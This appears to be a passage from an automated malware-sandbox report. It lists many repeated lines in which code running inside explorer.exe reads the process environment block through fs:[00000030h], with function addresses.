Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A3884 mov eax, dword ptr fs:[00000030h] 5_2_048A3884
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A3884 mov eax, dword ptr fs:[00000030h] 5_2_048A3884
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0483849B mov eax, dword ptr fs:[00000030h] 5_2_0483849B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048520A0 mov eax, dword ptr fs:[00000030h] 5_2_048520A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048520A0 mov eax, dword ptr fs:[00000030h] 5_2_048520A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048520A0 mov eax, dword ptr fs:[00000030h] 5_2_048520A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048520A0 mov eax, dword ptr fs:[00000030h] 5_2_048520A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048520A0 mov eax, dword ptr fs:[00000030h] 5_2_048520A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048520A0 mov eax, dword ptr fs:[00000030h] 5_2_048520A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048690AF mov eax, dword ptr fs:[00000030h] 5_2_048690AF
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485F0BF mov ecx, dword ptr fs:[00000030h] 5_2_0485F0BF
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485F0BF mov eax, dword ptr fs:[00000030h] 5_2_0485F0BF
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485F0BF mov eax, dword ptr fs:[00000030h] 5_2_0485F0BF
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F8CD6 mov eax, dword ptr fs:[00000030h] 5_2_048F8CD6
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048BB8D0 mov eax, dword ptr fs:[00000030h] 5_2_048BB8D0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048BB8D0 mov ecx, dword ptr fs:[00000030h] 5_2_048BB8D0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048BB8D0 mov eax, dword ptr fs:[00000030h] 5_2_048BB8D0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048BB8D0 mov eax, dword ptr fs:[00000030h] 5_2_048BB8D0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048BB8D0 mov eax, dword ptr fs:[00000030h] 5_2_048BB8D0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048BB8D0 mov eax, dword ptr fs:[00000030h] 5_2_048BB8D0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048258EC mov eax, dword ptr fs:[00000030h] 5_2_048258EC
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048E14FB mov eax, dword ptr fs:[00000030h] 5_2_048E14FB
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A6CF0 mov eax, dword ptr fs:[00000030h] 5_2_048A6CF0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A6CF0 mov eax, dword ptr fs:[00000030h] 5_2_048A6CF0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A6CF0 mov eax, dword ptr fs:[00000030h] 5_2_048A6CF0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A6C0A mov eax, dword ptr fs:[00000030h] 5_2_048A6C0A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A6C0A mov eax, dword ptr fs:[00000030h] 5_2_048A6C0A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A6C0A mov eax, dword ptr fs:[00000030h] 5_2_048A6C0A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A6C0A mov eax, dword ptr fs:[00000030h] 5_2_048A6C0A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F740D mov eax, dword ptr fs:[00000030h] 5_2_048F740D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F740D mov eax, dword ptr fs:[00000030h] 5_2_048F740D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F740D mov eax, dword ptr fs:[00000030h] 5_2_048F740D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048E1C06 mov eax, dword ptr fs:[00000030h] 5_2_048E1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048E1C06 mov eax, dword ptr fs:[00000030h] 5_2_048E1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048E1C06 mov eax, dword ptr fs:[00000030h] 5_2_048E1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048E1C06 mov eax, dword ptr fs:[00000030h] 5_2_048E1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048E1C06 mov eax, dword ptr fs:[00000030h] 5_2_048E1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048E1C06 mov eax, dword ptr fs:[00000030h] 5_2_048E1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048E1C06 mov eax, dword ptr fs:[00000030h] 5_2_048E1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048E1C06 mov eax, dword ptr fs:[00000030h] 5_2_048E1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048E1C06 mov eax, dword ptr fs:[00000030h] 5_2_048E1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048E1C06 mov eax, dword ptr fs:[00000030h] 5_2_048E1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048E1C06 mov eax, dword ptr fs:[00000030h] 5_2_048E1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048E1C06 mov eax, dword ptr fs:[00000030h] 5_2_048E1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048E1C06 mov eax, dword ptr fs:[00000030h] 5_2_048E1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048E1C06 mov eax, dword ptr fs:[00000030h] 5_2_048E1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F4015 mov eax, dword ptr fs:[00000030h] 5_2_048F4015
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F4015 mov eax, dword ptr fs:[00000030h] 5_2_048F4015
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A7016 mov eax, dword ptr fs:[00000030h] 5_2_048A7016
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A7016 mov eax, dword ptr fs:[00000030h] 5_2_048A7016
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A7016 mov eax, dword ptr fs:[00000030h] 5_2_048A7016
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485002D mov eax, dword ptr fs:[00000030h] 5_2_0485002D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485002D mov eax, dword ptr fs:[00000030h] 5_2_0485002D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485002D mov eax, dword ptr fs:[00000030h] 5_2_0485002D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485002D mov eax, dword ptr fs:[00000030h] 5_2_0485002D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485002D mov eax, dword ptr fs:[00000030h] 5_2_0485002D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0483B02A mov eax, dword ptr fs:[00000030h] 5_2_0483B02A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0483B02A mov eax, dword ptr fs:[00000030h] 5_2_0483B02A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0483B02A mov eax, dword ptr fs:[00000030h] 5_2_0483B02A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0483B02A mov eax, dword ptr fs:[00000030h] 5_2_0483B02A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485BC2C mov eax, dword ptr fs:[00000030h] 5_2_0485BC2C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485A44B mov eax, dword ptr fs:[00000030h] 5_2_0485A44B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04840050 mov eax, dword ptr fs:[00000030h] 5_2_04840050
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04840050 mov eax, dword ptr fs:[00000030h] 5_2_04840050
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048BC450 mov eax, dword ptr fs:[00000030h] 5_2_048BC450
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048BC450 mov eax, dword ptr fs:[00000030h] 5_2_048BC450
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0484746D mov eax, dword ptr fs:[00000030h] 5_2_0484746D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F1074 mov eax, dword ptr fs:[00000030h] 5_2_048F1074
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048E2073 mov eax, dword ptr fs:[00000030h] 5_2_048E2073
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485A185 mov eax, dword ptr fs:[00000030h] 5_2_0485A185
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04852581 mov eax, dword ptr fs:[00000030h] 5_2_04852581
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04852581 mov eax, dword ptr fs:[00000030h] 5_2_04852581
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04852581 mov eax, dword ptr fs:[00000030h] 5_2_04852581
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04852581 mov eax, dword ptr fs:[00000030h] 5_2_04852581
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0484C182 mov eax, dword ptr fs:[00000030h] 5_2_0484C182
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04822D8A mov eax, dword ptr fs:[00000030h] 5_2_04822D8A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04822D8A mov eax, dword ptr fs:[00000030h] 5_2_04822D8A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04822D8A mov eax, dword ptr fs:[00000030h] 5_2_04822D8A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04822D8A mov eax, dword ptr fs:[00000030h] 5_2_04822D8A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04822D8A mov eax, dword ptr fs:[00000030h] 5_2_04822D8A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04852990 mov eax, dword ptr fs:[00000030h] 5_2_04852990
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485FD9B mov eax, dword ptr fs:[00000030h] 5_2_0485FD9B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485FD9B mov eax, dword ptr fs:[00000030h] 5_2_0485FD9B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F05AC mov eax, dword ptr fs:[00000030h] 5_2_048F05AC
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F05AC mov eax, dword ptr fs:[00000030h] 5_2_048F05AC
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048535A1 mov eax, dword ptr fs:[00000030h] 5_2_048535A1
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048561A0 mov eax, dword ptr fs:[00000030h] 5_2_048561A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048561A0 mov eax, dword ptr fs:[00000030h] 5_2_048561A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A69A6 mov eax, dword ptr fs:[00000030h] 5_2_048A69A6
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04851DB5 mov eax, dword ptr fs:[00000030h] 5_2_04851DB5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04851DB5 mov eax, dword ptr fs:[00000030h] 5_2_04851DB5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04851DB5 mov eax, dword ptr fs:[00000030h] 5_2_04851DB5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A51BE mov eax, dword ptr fs:[00000030h] 5_2_048A51BE
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A51BE mov eax, dword ptr fs:[00000030h] 5_2_048A51BE
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A51BE mov eax, dword ptr fs:[00000030h] 5_2_048A51BE
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A51BE mov eax, dword ptr fs:[00000030h] 5_2_048A51BE
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A6DC9 mov eax, dword ptr fs:[00000030h] 5_2_048A6DC9
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A6DC9 mov eax, dword ptr fs:[00000030h] 5_2_048A6DC9
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A6DC9 mov eax, dword ptr fs:[00000030h] 5_2_048A6DC9
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A6DC9 mov ecx, dword ptr fs:[00000030h] 5_2_048A6DC9
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A6DC9 mov eax, dword ptr fs:[00000030h] 5_2_048A6DC9
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A6DC9 mov eax, dword ptr fs:[00000030h] 5_2_048A6DC9
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0482B1E1 mov eax, dword ptr fs:[00000030h] 5_2_0482B1E1
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0482B1E1 mov eax, dword ptr fs:[00000030h] 5_2_0482B1E1
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0482B1E1 mov eax, dword ptr fs:[00000030h] 5_2_0482B1E1
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048B41E8 mov eax, dword ptr fs:[00000030h] 5_2_048B41E8
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0483D5E0 mov eax, dword ptr fs:[00000030h] 5_2_0483D5E0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0483D5E0 mov eax, dword ptr fs:[00000030h] 5_2_0483D5E0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048EFDE2 mov eax, dword ptr fs:[00000030h] 5_2_048EFDE2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048EFDE2 mov eax, dword ptr fs:[00000030h] 5_2_048EFDE2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048EFDE2 mov eax, dword ptr fs:[00000030h] 5_2_048EFDE2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048EFDE2 mov eax, dword ptr fs:[00000030h] 5_2_048EFDE2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048D8DF1 mov eax, dword ptr fs:[00000030h] 5_2_048D8DF1
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04829100 mov eax, dword ptr fs:[00000030h] 5_2_04829100
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04829100 mov eax, dword ptr fs:[00000030h] 5_2_04829100
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04829100 mov eax, dword ptr fs:[00000030h] 5_2_04829100
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04844120 mov eax, dword ptr fs:[00000030h] 5_2_04844120
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04844120 mov eax, dword ptr fs:[00000030h] 5_2_04844120
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04844120 mov eax, dword ptr fs:[00000030h] 5_2_04844120
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04844120 mov eax, dword ptr fs:[00000030h] 5_2_04844120
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04844120 mov ecx, dword ptr fs:[00000030h] 5_2_04844120
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0482AD30 mov eax, dword ptr fs:[00000030h] 5_2_0482AD30
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04833D34 mov eax, dword ptr fs:[00000030h] 5_2_04833D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04833D34 mov eax, dword ptr fs:[00000030h] 5_2_04833D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04833D34 mov eax, dword ptr fs:[00000030h] 5_2_04833D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04833D34 mov eax, dword ptr fs:[00000030h] 5_2_04833D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04833D34 mov eax, dword ptr fs:[00000030h] 5_2_04833D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04833D34 mov eax, dword ptr fs:[00000030h] 5_2_04833D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04833D34 mov eax, dword ptr fs:[00000030h] 5_2_04833D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04833D34 mov eax, dword ptr fs:[00000030h] 5_2_04833D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04833D34 mov eax, dword ptr fs:[00000030h] 5_2_04833D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04833D34 mov eax, dword ptr fs:[00000030h] 5_2_04833D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04833D34 mov eax, dword ptr fs:[00000030h] 5_2_04833D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04833D34 mov eax, dword ptr fs:[00000030h] 5_2_04833D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04833D34 mov eax, dword ptr fs:[00000030h] 5_2_04833D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048EE539 mov eax, dword ptr fs:[00000030h] 5_2_048EE539
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F8D34 mov eax, dword ptr fs:[00000030h] 5_2_048F8D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048AA537 mov eax, dword ptr fs:[00000030h] 5_2_048AA537
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04854D3B mov eax, dword ptr fs:[00000030h] 5_2_04854D3B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04854D3B mov eax, dword ptr fs:[00000030h] 5_2_04854D3B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04854D3B mov eax, dword ptr fs:[00000030h] 5_2_04854D3B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485513A mov eax, dword ptr fs:[00000030h] 5_2_0485513A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485513A mov eax, dword ptr fs:[00000030h] 5_2_0485513A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0484B944 mov eax, dword ptr fs:[00000030h] 5_2_0484B944
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0484B944 mov eax, dword ptr fs:[00000030h] 5_2_0484B944
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04863D43 mov eax, dword ptr fs:[00000030h] 5_2_04863D43
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A3540 mov eax, dword ptr fs:[00000030h] 5_2_048A3540
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04847D50 mov eax, dword ptr fs:[00000030h] 5_2_04847D50
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0482C962 mov eax, dword ptr fs:[00000030h] 5_2_0482C962
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0482B171 mov eax, dword ptr fs:[00000030h] 5_2_0482B171
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0482B171 mov eax, dword ptr fs:[00000030h] 5_2_0482B171
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0484C577 mov eax, dword ptr fs:[00000030h] 5_2_0484C577
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0484C577 mov eax, dword ptr fs:[00000030h] 5_2_0484C577
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048BFE87 mov eax, dword ptr fs:[00000030h] 5_2_048BFE87
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485D294 mov eax, dword ptr fs:[00000030h] 5_2_0485D294
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485D294 mov eax, dword ptr fs:[00000030h] 5_2_0485D294
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048252A5 mov eax, dword ptr fs:[00000030h] 5_2_048252A5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048252A5 mov eax, dword ptr fs:[00000030h] 5_2_048252A5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048252A5 mov eax, dword ptr fs:[00000030h] 5_2_048252A5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048252A5 mov eax, dword ptr fs:[00000030h] 5_2_048252A5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048252A5 mov eax, dword ptr fs:[00000030h] 5_2_048252A5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F0EA5 mov eax, dword ptr fs:[00000030h] 5_2_048F0EA5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F0EA5 mov eax, dword ptr fs:[00000030h] 5_2_048F0EA5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F0EA5 mov eax, dword ptr fs:[00000030h] 5_2_048F0EA5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A46A7 mov eax, dword ptr fs:[00000030h] 5_2_048A46A7
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0483AAB0 mov eax, dword ptr fs:[00000030h] 5_2_0483AAB0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0483AAB0 mov eax, dword ptr fs:[00000030h] 5_2_0483AAB0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485FAB0 mov eax, dword ptr fs:[00000030h] 5_2_0485FAB0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04868EC7 mov eax, dword ptr fs:[00000030h] 5_2_04868EC7
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048536CC mov eax, dword ptr fs:[00000030h] 5_2_048536CC
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048DFEC0 mov eax, dword ptr fs:[00000030h] 5_2_048DFEC0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04852ACB mov eax, dword ptr fs:[00000030h] 5_2_04852ACB
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F8ED6 mov eax, dword ptr fs:[00000030h] 5_2_048F8ED6
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048376E2 mov eax, dword ptr fs:[00000030h] 5_2_048376E2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04852AE4 mov eax, dword ptr fs:[00000030h] 5_2_04852AE4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048516E0 mov ecx, dword ptr fs:[00000030h] 5_2_048516E0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0482C600 mov eax, dword ptr fs:[00000030h] 5_2_0482C600
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0482C600 mov eax, dword ptr fs:[00000030h] 5_2_0482C600
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0482C600 mov eax, dword ptr fs:[00000030h] 5_2_0482C600
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04858E00 mov eax, dword ptr fs:[00000030h] 5_2_04858E00
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048E1608 mov eax, dword ptr fs:[00000030h] 5_2_048E1608
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04838A0A mov eax, dword ptr fs:[00000030h] 5_2_04838A0A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04825210 mov eax, dword ptr fs:[00000030h] 5_2_04825210
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04825210 mov ecx, dword ptr fs:[00000030h] 5_2_04825210
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04825210 mov eax, dword ptr fs:[00000030h] 5_2_04825210
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04825210 mov eax, dword ptr fs:[00000030h] 5_2_04825210
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0482AA16 mov eax, dword ptr fs:[00000030h] 5_2_0482AA16
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0482AA16 mov eax, dword ptr fs:[00000030h] 5_2_0482AA16
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04843A1C mov eax, dword ptr fs:[00000030h] 5_2_04843A1C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485A61C mov eax, dword ptr fs:[00000030h] 5_2_0485A61C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485A61C mov eax, dword ptr fs:[00000030h] 5_2_0485A61C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0482E620 mov eax, dword ptr fs:[00000030h] 5_2_0482E620
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04864A2C mov eax, dword ptr fs:[00000030h] 5_2_04864A2C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04864A2C mov eax, dword ptr fs:[00000030h] 5_2_04864A2C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048DFE3F mov eax, dword ptr fs:[00000030h] 5_2_048DFE3F
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04829240 mov eax, dword ptr fs:[00000030h] 5_2_04829240
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04829240 mov eax, dword ptr fs:[00000030h] 5_2_04829240
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04829240 mov eax, dword ptr fs:[00000030h] 5_2_04829240
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04829240 mov eax, dword ptr fs:[00000030h] 5_2_04829240
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04837E41 mov eax, dword ptr fs:[00000030h] 5_2_04837E41
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04837E41 mov eax, dword ptr fs:[00000030h] 5_2_04837E41
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04837E41 mov eax, dword ptr fs:[00000030h] 5_2_04837E41
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04837E41 mov eax, dword ptr fs:[00000030h] 5_2_04837E41
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04837E41 mov eax, dword ptr fs:[00000030h] 5_2_04837E41
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04837E41 mov eax, dword ptr fs:[00000030h] 5_2_04837E41
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048EAE44 mov eax, dword ptr fs:[00000030h] 5_2_048EAE44
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048EAE44 mov eax, dword ptr fs:[00000030h] 5_2_048EAE44
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048EEA55 mov eax, dword ptr fs:[00000030h] 5_2_048EEA55
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048B4257 mov eax, dword ptr fs:[00000030h] 5_2_048B4257
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048DB260 mov eax, dword ptr fs:[00000030h] 5_2_048DB260
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048DB260 mov eax, dword ptr fs:[00000030h] 5_2_048DB260
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F8A62 mov eax, dword ptr fs:[00000030h] 5_2_048F8A62
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0483766D mov eax, dword ptr fs:[00000030h] 5_2_0483766D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0484AE73 mov eax, dword ptr fs:[00000030h] 5_2_0484AE73
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0484AE73 mov eax, dword ptr fs:[00000030h] 5_2_0484AE73
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0484AE73 mov eax, dword ptr fs:[00000030h] 5_2_0484AE73
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0484AE73 mov eax, dword ptr fs:[00000030h] 5_2_0484AE73
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0484AE73 mov eax, dword ptr fs:[00000030h] 5_2_0484AE73
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0486927A mov eax, dword ptr fs:[00000030h] 5_2_0486927A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048E138A mov eax, dword ptr fs:[00000030h] 5_2_048E138A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04831B8F mov eax, dword ptr fs:[00000030h] 5_2_04831B8F
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04831B8F mov eax, dword ptr fs:[00000030h] 5_2_04831B8F
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048DD380 mov ecx, dword ptr fs:[00000030h] 5_2_048DD380
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04852397 mov eax, dword ptr fs:[00000030h] 5_2_04852397
